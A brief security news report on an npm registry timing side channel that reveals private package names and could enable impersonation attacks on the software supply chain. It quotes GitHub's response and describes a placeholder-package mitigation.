Security News > 2022 > October > New npm timing attack could lead to supply chain attacks
Security researchers have discovered an npm timing attack that reveals the names of private packages so threat actors can release malicious clones publicly to trick developers into using them instead. The attack relies on a small time difference in the return of a "404 Not Found" error when searching for a private compared to a non-existent package in the repository.
While the response time difference is only a few hundred milliseconds, it is enough to determine whether a private package exists to perform package impersonation attacks.
Npm includes a registry API that allows users to download existing packages, check for the existence of packages, and receive information about all packages under a specific scope.
Aqua Security discovered the npm timing attack by using this API to check for the existence of private packages they created on npm and compared the response time of the 404 HTTP errors against API checks for non-existent packages.
"Because of these architectural limitations, we cannot prevent timing attacks from determining whether a specific private package exists on npm," GitHub told Aqua Security.
Organizations can create public packages that spoof their private packages as placeholders since npm doesn't allow uploading same-name packages on public repositories.